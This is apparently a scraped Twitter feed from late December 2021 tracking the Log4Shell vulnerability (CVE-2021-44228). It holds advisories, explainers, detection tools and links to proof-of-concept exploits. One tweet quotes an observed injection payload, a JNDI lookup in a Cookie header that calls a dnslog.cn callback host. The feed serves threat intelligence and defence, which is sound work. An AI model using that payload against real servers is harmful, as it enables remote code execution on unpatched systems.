2021-12-31 18:30:06CVE-2021-44228 https://t.co/NLm0RVgchG #HarsiaInfo https://har-sia.info/CVE-2021-44228.htmlHar_sia
2021-12-31 16:20:35#exploit Exploiting CVE-2021-44228 using PDFs as delivery channel https://t.co/hjRAkwg3FY https://github.com/eelyvy/log4jshell-pdfksg93rd
2021-12-31 16:10:48Arctic Wolf's #Log4Shell Deep Scan Tool can enable detection of both CVE-2021-45046 and CVE-2021-44228 within nest… https://t.co/wN66a6s4yq https://twitter.com/i/web/status/1476946278177247236ReaganMcafee
2021-12-31 15:10:53CVE-2021-44228 https://t.co/NLm0RVxfjG #HarsiaInfo https://har-sia.info/CVE-2021-44228.htmlHar_sia
2021-12-31 14:10:45Top 3 trending CVEs on Twitter Past 24 hrs: CVE-2021-44228: 572.2K (audience size) CVE-2021-38647: 157K CVE-2021-4… https://t.co/gIfcfhB2CW https://twitter.com/i/web/status/1476916058820943880CVEtrends
2021-12-31 14:10:23Log4j 2 CVE-2021-44228 | Software Architect’s Solution https://t.co/OXDU0BZADL #blueteam #log4j infosec https://bit.ly/3eu22Feuptycs
2021-12-31 13:40:12Following the recent Log4j vulnerability CVE-2021-44228, the Juniper Threat Labs team continues to monitor attacks… https://t.co/FCaHpPVzL1 https://twitter.com/i/web/status/1476910476604940290LudovicHazard
2021-12-31 10:10:18Log4Shell (CVE-2021-44228) is bad, but that doesn’t mean everything is bad. Even F5 Labs’ resident pessimist thinks… https://t.co/13NZbzAAK0 https://twitter.com/i/web/status/1476855923343867904F5Certified
2021-12-31 09:20:21Log4Shell - Detecting Log4j Vulnerability (CVE-2021-44228) Continued https://t.co/g18boFak9X https://bit.ly/3eAglZ4KyleGibbs44
2021-12-31 09:20:16Exploiting and Mitigating CVE-2021-44228: Log4j Remote Code Execution (RCE) https://t.co/jk45AK5nzX #Pentesting… https://t.co/3hkaxPReDV https://sysdig.com/blog/exploit-detect-mitigate-log4j-cve/ https://twitter.com/i/web/status/1476844420230168577ptracesecurity
2021-12-31 07:50:12Exploiting CVE-2021-44228 (log4j) using PDFs as delivery channel - PoC https://t.co/sq0dsBh3y4 #infosec #pentest #bugbounty RT @Dinosn https://github.com/eelyvy/log4jshell-pdfbeingsheerazali
2021-12-31 07:20:12👀Looking for log4shell resources? -Understanding CVE-2021-44228 https://t.co/Ucp18c5MvF -Mitigation w/ K8s network… https://t.co/ukFKIerB1z https://setns.run/3pGAt1R https://twitter.com/i/web/status/1476814639866470419bcarlton
2021-12-31 06:40:06log4jshell-pdf Exploiting CVE-2021-44228 using #PDFs as delivery channel - PoC https://t.co/KvON6oyXg2 GitHub - e… https://t.co/u1R7Xv63Tv https://github.com/eelyvy/log4jshell-pdf https://twitter.com/i/web/status/1476804388488368128hack_git
2021-12-31 05:40:12CSW Researchers have developed a Proof-of-Concept exploit for CVE-2021-44228 Log4j vulnerability. Read our full a… https://t.co/R5VcQ2Zd3T https://twitter.com/i/web/status/1476787911311962120CswWorks
2021-12-31 04:50:04【資安月報】2021年12月 https://t.co/oVZUQhOMBb 在歐美國家進入購物季,準備要慶祝聖誕節和跨年的12月份,震憾全球IT界的重大漏洞「Log4Shell」(CVE-2021-44228),從12月上旬出現後,便成為IT業界關注的焦點。 https://www.ithome.com.tw/news/148664M157q_News_RSS
2021-12-31 01:40:14Why Haven't We Seen a Devastating Log4j Worm Yet? #log4j #Log4Shell #cybersecurity CVE-2021-44228 https://t.co/JT9HPqlYnp https://www.youtube.com/watch?v=-IyWoz1gA5gMalwareTechBlog
2021-12-31 00:10:45What do security leaders need to know about the #Log4Shell (CVE-2021-44228) vulnerability? Find out in this post ➡️… https://t.co/XxADvQnbv2 https://twitter.com/i/web/status/1476704959781552141SaltSecurity
2021-12-30 21:20:05#HCL #Knowledgebase CVE-2021-44228 + CVE-2021-45046 + CVE-2021-45105 + CVE-2021-44832, Log4J 2 / Log4Shell Security… https://t.co/vl7qjRZXIF https://twitter.com/i/web/status/1476664181860483080domino_robot
2021-12-30 20:40:10The @TrendMicroRSRCH team is actively tracking #Log4Shell, aka CVE-2021-44228. This critical vulnerability is affec… https://t.co/lLOjra2Xrq https://twitter.com/i/web/status/1476653185611804685velez1066
2021-12-30 20:40:09The @TrendMicroRSRCH team is actively tracking #Log4Shell, aka CVE-2021-44228. This critical vulnerability is affec… https://t.co/FEf4K7Ukxd https://twitter.com/i/web/status/1476653374728720396velez1066
2021-12-30 20:40:08The @TrendMicroRSRCH team is actively tracking #Log4Shell, aka CVE-2021-44228. This critical vulnerability is affec… https://t.co/SFsVpo3Lt8 https://twitter.com/i/web/status/1476653471588044800velez1066
2021-12-30 20:10:29Exploiting CVE-2021-44228 (log4j) using PDFs as delivery channel - PoC https://t.co/UEABEcSpHD https://github.com/eelyvy/log4jshell-pdfDinosn
2021-12-30 20:10:15The @TrendMicroRSRCH team is actively tracking #Log4Shell, aka CVE-2021-44228. This critical vulnerability is affec… https://t.co/ZMlM1Za4cP https://twitter.com/i/web/status/1476645758745067528RTocaxelli
2021-12-30 20:10:12Jak wykorzystałem podatność log4shell (CVE-2021-44228) w kontrolerze od Ubiquiti. PoC: https://t.co/J9BU2Gbbhn https://sekurak.pl/jak-wykorzystalem-podatnosc-log4shell-cve-2021-44228-w-kontrolerze-wifi-od-ubiquiti-poc/Sekurak
2021-12-30 20:10:06Posiedziałem jeden dłuższy wieczór i taki efekt: podatność log4shell (CVE-2021-44228) w kontrolerze od Ubiquiti. Pr… https://t.co/VEPvMIDSXe https://twitter.com/i/web/status/1476646566803001348sajdoor
2021-12-30 19:40:23How has it only been 20 days since CVE-2021-44228 was published? Feels like it's been Log4evertommysec
2021-12-30 19:30:08👀Looking for log4shell resources? -Understanding CVE-2021-44228 https://t.co/fDrRB9mWiK -Mitigation w/ K8s network… https://t.co/Sp0zIk70yk https://setns.run/3qzSTR5 https://twitter.com/i/web/status/1476634972492648459mdandersen
2021-12-30 18:10:58#Log4Shell Simplified - All you need to know about #Log4j #CVE-2021-44228. #cybersecurity #infosec #hacking… https://t.co/RfozXHTONL https://twitter.com/i/web/status/1476614143008514050misaelban
2021-12-30 15:11:17CVE-2021-44228 https://t.co/NLm0RVgchG #HarsiaInfo https://har-sia.info/CVE-2021-44228.htmlHar_sia
2021-12-30 15:05:02Cybersecurity experts believe CVE-2021-44228, a remote code execution flaw in #Log4j, will take months, if not year… https://t.co/wVyfSdQukb https://twitter.com/i/web/status/1476567254154231809McAfee_ATR
2021-12-30 14:20:55Todo sobre el issue de Apache Log4j2 CVE-2021-44228 https://t.co/ZjCkSH6JcT https://ift.tt/3JspgKiFreakBizarro
2021-12-30 13:40:27"The attempted intrusion exploited the newly discovered Log4Shell flaw (CVE-2021-44228, CVSS score: 10.0) to gain a… https://t.co/BVqcTob9hi https://twitter.com/i/web/status/1476548472203616258CorbeauAttentif
2021-12-30 13:30:43Explore CVE-2021-44228 - a vulnerability in #log4j affecting almost all software under the sun - in a very practica… https://t.co/IZinQSeZdG https://twitter.com/i/web/status/1476545778818637825AndreasWienes
2021-12-30 13:00:43We've developed a Burp plugin to detect log4j vulnerabilities (CVE-2021-44228 / CVE-2021-45046) on scale. It suppor… https://t.co/KilMIg0D9b https://twitter.com/i/web/status/1476536672892379137ysecurityde
2021-12-30 11:31:59Log4j (CVE-2021-44228) RCE Vulnerability Explained https://t.co/ex4ZZ0uB0S @YouTubeより https://youtu.be/0-abhd-CLwQLL_Learner
2021-12-30 11:30:17Log4Shell sample vulnerable application (CVE-2021-44228) https://t.co/TlI6CtLq4p @YouTubeより https://youtu.be/oShZwiDTx9ULL_Learner
2021-12-30 11:00:33log4j-detector v2021.12.29 releases: detects vulnerable Log4J versions (CVE-2021-44228, CVE-2021-45046) on your fil… https://t.co/xGteVgCsgP https://twitter.com/i/web/status/1476507629836984322the_yellow_fall
2021-12-30 10:20:51@RigneySec Intel® Product Advisory for Apache Log4j2 Vulnerabilities (CVE-2021-44228 &amp; CVE-2021-45046) https://t.co/nzruwHJ5wp https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00646.html42Sz40
2021-12-30 10:20:32@AddressIntel Intel® Product Advisory for Apache Log4j2 Vulnerabilities (CVE-2021-44228 &amp; CVE-2021-45046) https://t.co/nzruwHJ5wp https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00646.html42Sz40
2021-12-30 08:51:54Demo: Mitigating Log4Shell (CVE-2021-44228) with NSX https://t.co/QE7amfCGj3 https://dy.si/wEsCk32saglik_erkan
2021-12-30 08:41:11HANA XSA log4j CVE-2021-44228 | SAP Blogs https://t.co/NMMOMoWSpv https://t.co/YYLlHiUzeh https://bit.ly/318Wf4Ssbuisel
2021-12-30 05:00:33The @TrendMicroRSRCH team is actively tracking #Log4Shell, aka CVE-2021-44228. This critical vulnerability is affec… https://t.co/PCnDb1X9wA https://twitter.com/i/web/status/1476417187527151618aacevesj
2021-12-30 02:34:44“更新:Apache Log4j の脆弱性対策について(CVE-2021-44228):IPA 独立行政法人 情報処理推進機構” https://t.co/IXdsgvPYdj https://htn.to/3LM64fqBLAmodokey
2021-12-30 02:22:47Liked on YouTube: Log4j Vulnerability (Log4Shell) Explained // CVE-2021-44228 https://t.co/r5dwFY4ILf https://www.youtube.com/watch?v=w2F67LbEtnkPekosoGarcia
2021-12-30 02:22:25#Log4j (CVE-2021-44228) vulnerability is quite scary. 90% of the games I play use this library 🙃OfficialAhmed0
2021-12-30 02:02:07The #Log4Shell/ #Log4j Vulnerability (CVE-2021-44228) Explained https://t.co/E3Dqah1CGL by @BlackBerry https://buff.ly/3z74smKpeterjmsimons
2021-12-30 01:53:43IPA/更新:Apache Log4j の脆弱性対策について(CVE-2021-44228) https://t.co/GBs7rGoicU e-gov電子申請でjavaを使わなくなったおかげで、今のところ影響はなさそう。 https://www.ipa.go.jp/security/ciadr/vul/alert20211213.htmltucan
2021-12-30 01:10:14@thinkorswim Have you disclosed whether your user platform is vulnerable to log4shell (CVE-2021-44228). Are you?pmcslabs
2021-12-30 00:50:36AI Spera is collecting and analyzing the real-time data of Log4j attacks (CVE-2021-44228) every day. For inquiries… https://t.co/fwq4JJBTCO https://twitter.com/i/web/status/1476353768275202054AISpera
2021-12-29 23:20:13Triadd Software Corporation is aware of &lt;b&gt;Log4j (CVE 2021-45046 &amp; CVE-2021-44228)&lt;/b&gt; vulnerabilities that was dis… https://t.co/FCS6vfprY4 https://twitter.com/i/web/status/1476330563027935236TriaddSoftware
2021-12-29 23:12:00PoC Log4PowerShell.- Una prueba de concepto para la vulnerabilidad CVE-2021-44228 escrita en PowerShell. Este scrip… https://t.co/bYVqlGQa48 https://twitter.com/i/web/status/1476327290133008385OscarVA__
2021-12-29 21:20:16Citrix Security Advisory for CVE-2021-44228, CVE-2021-45046, CVE-2021-45105 and CVE-2021-44832. | https://t.co/A6eXrAWP9a https://support.citrix.com/article/CTX335705ThomasPreischl
2021-12-29 20:20:35Nueva Vulnerabilidad de DoS en Apache Log4j 2 CVE-2021-44228… https://t.co/xTSpZD6axi https://cncs.gob.do/nueva-vulnerabilidad-de-dos-en-apache-log4j-2-2-15-0/matarturo
2021-12-29 19:20:15Quick reference for #Log4Shell CVE-2021-44228: The OG RCE: fixed-ish 2.15.0 CVE-2021-45046: RCE: fixed 2.16.0 CVE-… https://t.co/sNU8BnsHlM https://twitter.com/i/web/status/1476269853388464134ksigler
2021-12-29 19:10:11A critical vulnerability was discovered in the Apache log4j project (CVE-2021-44228). Even if products and services… https://t.co/rHO95kB68w https://twitter.com/i/web/status/1476267072682438669DevolutionsInc
2021-12-29 18:00:06Log4Shell Simplified : All you need to know about CVE-2021-44228 https://t.co/5vzxigHIjD #infosec #pentest #bugbounty RT @Dinosn https://infosecwriteups.com/log4shell-simplified-all-you-need-to-know-about-cve-2021-44228-3c70d59c307a?source=rss----7b722bfd1b8d---4beingsheerazali
2021-12-29 17:50:14Log4Shell Simplified : All you need to know about CVE-2021-44228 https://t.co/dNqhTzQTGT https://infosecwriteups.com/log4shell-simplified-all-you-need-to-know-about-cve-2021-44228-3c70d59c307a?source=rss----7b722bfd1b8d---4Dinosn
2021-12-29 17:40:36https://t.co/o9ZY5ONRtJ (https://t.co/UDd0QhVrQZ) / Server vulnerable to Log4J CVE-2021-44228 https://t.co/iddEKWEcvN http://Solidaris.be http://emut.be https://leakix.net/reports/4a11dacd-ef0d-40ce-989c-c02f461d9c01PolBegov
2021-12-29 17:40:32@yo_yo_yo_jbo The "easy to exploit" refers to the original log4shell vulnerability from two weeks ago (CVE-2021-44228) not to the new one41thexplorer
2021-12-29 17:10:20Demo: Mitigating Log4Shell (CVE-2021-44228) with NSX https://t.co/riZae5sbcw https://dy.si/wpaUmfverdugo_vmware
2021-12-29 16:40:03Listado de CVE: CVE-2021-44228 CVE-2021-45046 CVE-2021-45105orvotron
2021-12-29 16:10:34👀Looking for log4shell resources? -Understanding CVE-2021-44228 https://t.co/LX3UDCfEVX -Mitigation w/ K8s network… https://t.co/cp7q3NaMmN https://setns.run/3EHa0We https://twitter.com/i/web/status/1476221541398589452sysdig
2021-12-29 15:24:59The @TrendMicroRSRCH team is actively tracking #Log4Shell, aka CVE-2021-44228. This critical vulnerability is affec… https://t.co/kC1b0irRA6 https://twitter.com/i/web/status/1476210978027196417velez1066
2021-12-29 15:23:25The @TrendMicroRSRCH team is actively tracking #Log4Shell, aka CVE-2021-44228. This critical vulnerability is affec… https://t.co/AzQQy4FwJr https://twitter.com/i/web/status/1476211143882551300velez1066
2021-12-29 15:15:00CVE-2021-44228 https://t.co/NLm0RVgchG #HarsiaInfo https://har-sia.info/CVE-2021-44228.htmlHar_sia
2021-12-29 14:15:04Top 3 trending CVEs on Twitter Past 24 hrs: CVE-2021-44832: 5.6M (audience size) CVE-2021-44228: 579.3K CVE-2021-4… https://t.co/gCwBOCErrI https://twitter.com/i/web/status/1476191283408519176CVEtrends
2021-12-29 13:41:40Another Remote Code Execution Vulnerability Patched in Log4j | Secu... (Securityweek) CVE-2021-44228, also known a… https://t.co/GDORcAuUzb https://twitter.com/i/web/status/1476184126227054595InfoSec_b
2021-12-29 13:11:37Investigating CVE-2021-44228 #Log4Shell Vulnerability https://t.co/xwDk4PL9p4 https://dy.si/5ZeXA_MatteoBelletti
2021-12-29 13:01:23Log4j 又有新的 RCE 漏洞 加上之前的兩個: CVE-2021-44228 CVE-2021-45046 這個 CVE-2021-44832 已經是第三個 有在用的人要記得升級到以下其中一個版本 - 2.17.1… https://t.co/9Nis8beMiY https://twitter.com/i/web/status/1476174217695547392M157q
2021-12-29 12:02:10The @TrendMicroRSRCH team is actively tracking #Log4Shell, aka CVE-2021-44228. This critical vulnerability is affec… https://t.co/EzqoPYmmhx https://twitter.com/i/web/status/1476159273088569352lucaslima_dsl
2021-12-29 11:32:09Log4Shell Simplified : All you need to know about CVE-2021-44228 #infosec #infosecurity #cybersecurity #threatintel… https://t.co/C4wU9N6IM6 https://twitter.com/i/web/status/1476152425656561668CyberIQs_
2021-12-29 11:31:28New #infosec #Blog Released - Log4Shell Simplified : All you need to know about CVE-2021-44228 -… https://t.co/b9xVdAYJvt https://twitter.com/i/web/status/1476152863198158854infosec_advisor
2021-12-29 11:10:57Log4Shell Simplified : All you need to know about CVE-2021-44228 https://t.co/3fiXRYFA6u https://infosecwriteups.com/log4shell-simplified-all-you-need-to-know-about-cve-2021-44228-3c70d59c307a?source=rss----7b722bfd1b8d---4DerechodelaRed
2021-12-29 11:00:12New Write-up on InfoSec Write-ups publication : "Log4Shell Simplified : All you need to know about CVE-2021-44228"… https://t.co/3BDmh8WNZo https://twitter.com/i/web/status/1476145530719899650InfoSecComm
2021-12-29 10:51:22Log4Shell Simplified : All you need to know about CVE-2021-44228 https://t.co/nyql8bYtUu https://infosecwriteups.com/log4shell-simplified-all-you-need-to-know-about-cve-2021-44228-3c70d59c307a?source=rss----7b722bfd1b8d---4hackplayers
2021-12-29 10:51:12Following the recent Log4j vulnerability CVE-2021-44228, the Juniper Threat Labs team continues to monitor attacks… https://t.co/zkB4XeLSnC https://twitter.com/i/web/status/1476142501681582086LudovicHazard
2021-12-29 10:50:55Following the recent Log4j vulnerability CVE-2021-44228, the Juniper Threat Labs team continues to monitor attacks… https://t.co/yf0fZGe8px https://twitter.com/i/web/status/1476142755265097734LudovicHazard
2021-12-29 10:00:16Since we objectively need to redefine the RCE term, what you prefer to call CVE-2021-44228 or other serious RCEs?it4sec
2021-12-29 10:00:04Added to $PRO.ax $PRO Snare product immune from CVE-2021-44228 Log4j vulnerability and according to their blog post… https://t.co/XzHSSOUOPu https://twitter.com/i/web/status/1476130488804806660edgeworth888
2021-12-29 09:32:48The Log4Shell/ Log4j Vulnerability (CVE-2021-44228) Explained https://t.co/kpCkSCakEH https://t.co/qVQFfp2Rwg https://bit.ly/3sDBCJyBilekSimon
2021-12-29 09:27:25🔴APACHE🔴 Múltiples vulnerabilidades de severidad alta en productos APACHE: CVE-2021-45105,CVE-2021-44228 Más inf… https://t.co/ZlTUbZyzv8 https://twitter.com/i/web/status/1476119536453787648GrupoICA_Ciber
2021-12-29 09:22:21🔴DEBIAN🔴 Múltiples vulnerabilidades de severidad alta en productos DEBIAN: CVE-2021-45105,CVE-2021-44228 Más inf… https://t.co/XuAg2SlXjP https://twitter.com/i/web/status/1476120318653739009GrupoICA_Ciber
2021-12-29 09:21:41🔴NETAPP🔴 Múltiples vulnerabilidades de severidad alta en productos NETAPP: CVE-2021-45105,CVE-2021-44228 Más inf… https://t.co/AuDMvHbbRA https://twitter.com/i/web/status/1476120406721536000GrupoICA_Ciber
2021-12-29 08:40:24🏴‍☠️ La saga #Log4j continue après CVE-2021-45105, CVE-2021-45046 CVE-2021-44228 voici CVE-2021-44832. Ce RCE est c… https://t.co/SNE8CbTMK6 https://twitter.com/i/web/status/1476110714460946433JMousqueton
2021-12-29 08:22:57Apache Log4jの任意のコード実行の脆弱性(CVE-2021-44228)に関する注意喚起 https://t.co/CuTuebrVfP @jpcert https://www.jpcert.or.jp/at/2021/at210050.htmlnaozume
2021-12-29 08:22:09We continue to track the prevalence of #Log4j (CVE-2021-44228) - now stands at 82 countries where we have detected… https://t.co/szMkBuj69u https://twitter.com/i/web/status/1476104827369365506Raj_Samani
2021-12-29 08:01:59HANA XSA log4j CVE-2021-44228 | SAP Blogs https://t.co/2lbu1Lh4bR https://t.co/j3bHQ3JjCM https://bit.ly/3FFGx09Salvo_De_Caro
2021-12-29 08:00:10Log4j- The bombshell zero-day vulnerability (CVE-2021-44228) rated one of the severe exploits in the recent times w… https://t.co/k2MWqtTKeh https://twitter.com/i/web/status/1476100617768554496inirmaljoshi
2021-12-29 06:52:12Example CVE-2021-44228 payload: Cookie: ${jndi:ldap://[target IP address].2jrh6f.dnslog.cn} Path targeted: /webss… https://t.co/lb6qETbgtv https://twitter.com/i/web/status/1476082510236839938bad_packets
2021-12-29 06:12:13CVE-2021-44228 Impact of Log4j Vulnerabilities CVE-2021-44228, CVE-2021-45046, CVE-2021-45105, and CV.. -… https://t.co/zJivEoE6kb https://twitter.com/i/web/status/1476071810563198976CisoInvisible
2021-12-29 04:40:19@MalwareTechBlog @thegrugq @ncsc_nl @IPFS @ncsc_nl @RGBhacks home@log4j (CVE-2021-44228) https://t.co/xV8aelicn0RGBhacks
2021-12-29 03:52:17CVE-2021-44228の詳細 https://t.co/ppDM6lvR1D log4j 2.17.1が出た原因の詳細。リモートのconfigファイルを使うか、DLさせるか、とにかくまず定義ファイルを変更してJDBCap… https://t.co/QfRfgSgQfe https://checkmarx.com/blog/cve-2021-44832-apache-log4j-2-17-0-arbitrary-code-execution-via-jdbcappender-datasource-element/ https://twitter.com/i/web/status/1476035688718307329jingbay
2021-12-29 03:22:21Apache Log4j多个高危漏洞(CVE-2021-44228/CVE-2021-4104/CVE-2021-45046/CVE-2021-45105/ CVE-2021-44832)处置手册… https://t.co/KRdS7el5sf https://twitter.com/i/web/status/1476028120683663361buaqbot
2021-12-29 02:30:37Apache Log4j多个高危漏洞(CVE-2021-44228/CVE-2021-4104/CVE-2021-45046/CVE-2021-45105/ CVE-2021-44832)处置手册… https://t.co/TzOFQTnEWM https://twitter.com/i/web/status/1476013588741566469buaqbot
2021-12-29 01:43:11CVE-2021-44832、ざっと読んだ感じだと、攻撃者が設定ファイル変更の権限を持っているという前提条件があるようにみえるので、CVE-2021-44228よりはマシという感じなのかしら。riikunn_ryo
2021-12-29 01:41:24Twitter以外に社内でも言及し過ぎたせいで、「CVE-2021-44228」というCVE番号を覚えてしまうというriikunn_ryo
2021-12-29 00:41:31https://t.co/wEAJph4Vet The complexity of this vulnerability is higher than the original CVE-2021-44228 since it… https://t.co/Fmh20ixLIE https://checkmarx.com/blog/cve-2021-44832-apache-log4j-2-17-0-arbitrary-code-execution-via-jdbcappender-datasource-element/ https://twitter.com/i/web/status/1475987869252866048vaexdanny
2021-12-29 00:21:16Citrix Security Advisory for CVE-2021-44228, CVE-2021-45046, CVE-2021-45105 and CVE-2021-44832. | https://t.co/A6eXrAWP9a https://support.citrix.com/article/CTX335705ThomasPreischl
2021-12-28 23:50:22.@ProductCERT: An advisory has been updated: "SSA-661247: Apache Log4j Vulnerabilities (Log4Shell, CVE-2021-44228,… https://t.co/rTJgH6Fq3n https://twitter.com/i/web/status/1475975990388142084Woronka
2021-12-28 23:05:35An advisory has been updated: "SSA-661247: Apache Log4j Vulnerabilities (Log4Shell, CVE-2021-44228, CVE-2021-45046)… https://t.co/rrJJOP3W5n https://twitter.com/i/web/status/1475962847289090049ProductCERT
2021-12-28 22:47:58I wonder if people realize that the Alibaba researcher(s) who reported CVE-2021-44228 (#Log4j) to the ASF in violat… https://t.co/Hh6Pn3iJQX https://twitter.com/i/web/status/1475958473389129730plankers
2021-12-28 21:51:56New post: "Wrote a tool to verify whether a simple Java webapp is vulnerable to CVE-2021-44228 given a version of L… https://t.co/k1PHXVdGPo https://twitter.com/i/web/status/1475946701722730498Myinfosecfeed
2021-12-28 20:30:38This (CVE-2021-44832), and more importantly CVE-2021-44228 (the one that matters), were expensive coordinated vulne… https://t.co/PUcrfKijMS https://twitter.com/i/web/status/1475926737716453380zmanion
2021-12-28 19:52:31Following the recent Log4j vulnerability CVE-2021-44228, the Juniper Threat Labs team continues to monitor attacks… https://t.co/lRA1UynwSR https://twitter.com/i/web/status/1475915276667531266Acecareercoach
2021-12-28 19:50:46🚨 NEW: CVE-2021-44228 🚨 Apache Log4j2 2.0-beta9 through 2.12.1 and 2.13.0 through 2.15.0 JNDI features used in conf… https://t.co/LG6BfRSubR https://twitter.com/i/web/status/1475916852429733892threatintelctr
2021-12-28 19:30:11Following the recent Log4j vulnerability CVE-2021-44228, the Juniper Threat Labs team continues to monitor attacks… https://t.co/exl2X2zfY3 https://twitter.com/i/web/status/1475911555942436865psibalde
2021-12-28 19:00:09The @TrendMicroRSRCH team is actively tracking #Log4Shell, aka CVE-2021-44228. This critical vulnerability is affec… https://t.co/aNgteoXslF https://twitter.com/i/web/status/1475904200999641090KellyStefaniGo1
2021-12-28 19:00:06The @TrendMicroRSRCH team is actively tracking #Log4Shell, aka CVE-2021-44228. This critical vulnerability is affec… https://t.co/5nB6ALv3M1 https://twitter.com/i/web/status/1475904289331625988KellyStefaniGo1
2021-12-28 18:50:19Yep - read the CVE and the patch notes before panicking. After CVE-2021-44228 everything else has been pretty narro… https://t.co/8BEaJeAZuY https://twitter.com/i/web/status/1475900858143371266jfslowik
2021-12-28 18:10:42SentinelOne vs Apache Log4j2 (CVE-2021-44228) - Linux - Detection, Prevention &amp; Mitigation #apache #log4j #infosec… https://t.co/T1vdaCkK6Z https://twitter.com/i/web/status/1475889308372508675GutmanYotam
2021-12-28 16:40:15This is a Practical Demonstration for exploitation of Apache Log4j2 (CVE-2021-44228) Vulnerability .This is a criti… https://t.co/wOv0m8vRGM https://twitter.com/i/web/status/1475867553037623303GisppOfficial
2021-12-28 16:40:12This is a Practical Demonstration for exploitation of Apache Log4j2 (CVE-2021-44228) Vulnerability .This is a criti… https://t.co/NtkCC4ZVwc https://twitter.com/i/web/status/1475867855014875141GisppOfficial
2021-12-28 16:40:08This is a Practical Demonstration for exploitation of Apache Log4j2 (CVE-2021-44228) Vulnerability .This is a criti… https://t.co/tnZMHCjved https://twitter.com/i/web/status/1475868463016988673GisppOfficial
2021-12-28 16:20:07The Log4Shell/ Log4j Vulnerability (CVE-2021-44228) Explained https://t.co/b2zaHiVGtk https://t.co/V0FOYR0ldT https://bit.ly/3mG1ocqdwood87
2021-12-28 15:40:30The @TrendMicroRSRCH team is actively tracking #Log4Shell, aka CVE-2021-44228. This critical vulnerability is affec… https://t.co/hGeItDjNzl https://twitter.com/i/web/status/1475852342943694851CaraWainwright7
2021-12-28 15:40:26Following the recent Log4j vulnerability CVE-2021-44228, the Juniper Threat Labs team continues to monitor attacks… https://t.co/xqeqebZ75i https://twitter.com/i/web/status/1475852672171495434kaser46
2021-12-28 15:40:05Published in response to CVE-2021-44228, this playbook and its sub-playbooks can be used to investigate and respond… https://t.co/MDKqc2q4J6 https://twitter.com/i/web/status/1475853299542757378KyleGibbs44
2021-12-28 15:10:14CVE-2021-44228 https://t.co/NLm0RVgchG #HarsiaInfo https://har-sia.info/CVE-2021-44228.htmlHar_sia
2021-12-28 14:50:05HANA XSA log4j CVE-2021-44228 | SAP Blogs https://t.co/uDAwfBj8h2 https://t.co/o3yceGT5nA https://bit.ly/32ISkfKsrmuc
2021-12-28 14:40:10CVE-2021-44228 Log4j (Minecraft) RCE Proof-Of-Concept https://t.co/V1RMvZS14V https://ift.tt/32M3MY4FreakBizarro
2021-12-28 14:10:18Top 3 trending CVEs on Twitter Past 24 hrs: CVE-2016-3309: 321.7K (audience size) CVE-2021-44228: 277.6K CVE-2021-… https://t.co/vYwNKrZ1H6 https://twitter.com/i/web/status/1475828893756149764CVEtrends
2021-12-28 14:10:15HANA XSA log4j CVE-2021-44228 | SAP Blogs https://t.co/DivQlNVjVc https://t.co/XBv0hK8eFM https://bit.ly/3qx8bpHsbuisel
2021-12-28 13:40:06log4jについてUnity自体は今のところ大丈夫だそうです。 December 2021 Security Update (CVE-2021-44228, CVE-2021-45046, log4j Java library) https://t.co/oKbXchpkn0 https://unity.com/ja/security/unity-sec-21720ToyaShiwasu
2021-12-28 13:20:18The @TrendMicroRSRCH team is actively tracking #Log4Shell, aka CVE-2021-44228. This critical vulnerability is affec… https://t.co/Y9L1FzDCTb https://twitter.com/i/web/status/1475817839642779651Mikael48655770
2021-12-28 10:30:17Check for CVE-2021-44228 log4j RCE | Detectify https://t.co/OmJD8qxarN https://aeternusmalus.wordpress.com/2021/12/28/check-for-cve-2021-44228-log4j-rce-detectify/d34dr4bbit
2021-12-28 10:30:06Log4Shell: Log4j 0-day Remote Code Execution Vulnerability (CVE-2021-44228) ▸ https://t.co/JxpmCioLvU… https://t.co/jjp9w99GMv https://securityforeveryone.com/blog/log4shell-log4j-0-day-remote-code-execution-vulnerability-cve-2021-44228 https://twitter.com/i/web/status/1475775822086746113secforeveryone
2021-12-28 10:20:06Log4shell (CVE-2021-44228) is a critical vulnerability identified in the Apache Log4j Java library on Thursday, Dec… https://t.co/gMjhy13jyr https://twitter.com/i/web/status/1475771514469470208EZRentOut
2021-12-28 10:20:05Log4shell (CVE-2021-44228) is a critical vulnerability identified in the Apache Log4j Java library on Thursday, Dec… https://t.co/GkvhUUAvF1 https://twitter.com/i/web/status/1475772080104878080OfficeInventory
2021-12-28 09:50:07HANA XSA log4j CVE-2021-44228 | SAP Blogs https://t.co/3XAEzMdEJc https://t.co/YrMc1oHRFS https://bit.ly/33SPNA0tobias_wegener
2021-12-28 09:10:05A critical vulnerability was discovered in the Apache log4j project (CVE-2021-44228). Even if products and services… https://t.co/4k2bZB0idL https://twitter.com/i/web/status/1475753533580484609remotedeskman
2021-12-28 07:40:08Detection of Log4j Vulnerability (CVE-2021-44228) Using V3 Network #infosec #infosecurity #cybersecurity… https://t.co/Yy2aNIbWaU https://twitter.com/i/web/status/1475731584351412224CyberIQs_
2021-12-28 05:21:06「SIDfm の監視対象製品への影響」に製品情報を追加・更新しました。(2021年12月28日) Apache Log4j CVE-2021-44228 (Log4Shell) の影響有無リスト | SIDfm ブログ https://t.co/fAwr9W3IwQ https://www.softek.co.jp/SID/blog/archive/entry/20211215.htmlsoftek_jp
2021-12-28 04:50:12色々と落ち着いたので、Tableauのlog4jのまとめ。 CVE-2021-44228 及び CVE-2021-45046は2021/12/15へアップデート https://t.co/33Q0C55zle CVE-2021-4… https://t.co/KCOqMac0Qp https://kb.tableau.com/articles/Issue/Apache-Log4j2-vulnerability-Log4shell?lang=ja https://twitter.com/i/web/status/1475690213813141504nohoyan
2021-12-28 03:10:33【自分用メモ】2021-12-28(更新) Apache Log4jの任意のコード実行の脆弱性(CVE-2021-44228)に関する注意喚起 https://t.co/YcxQFOVFQD https://www.jpcert.or.jp/at/2021/at210050.htmlOrangeMorishita
2021-12-28 02:50:50Apache Log4jの任意のコード実行の脆弱性(CVE-2021-44228)に関する注意喚起を更新。詳細は「III. 対策」、「V. 参考情報」をご覧ください。また、本件の更新には引き続き注視いただくようお願いいたします。^… https://t.co/2zJvvsb02X https://twitter.com/i/web/status/1475658974251077632jpcert
2021-12-28 02:50:23注意喚起: Apache Log4jの任意のコード実行の脆弱性(CVE-2021-44228)に関する注意喚起 (更新) 2021-12-28T11:15+09:00 https://t.co/OORB6reATN 全確保支援士NEWS https://www.jpcert.or.jp/at/2021/at210050.htmlkai_ri_0001
2021-12-28 02:20:09@SantosVini7 Ambiente de teste para a CVE-2021-44228 baseado nas regras do ModSec da OWASP https://t.co/zXvr2Prw0f https://github.com/felipe8398/ModSec-log4j2felipe_p_s__
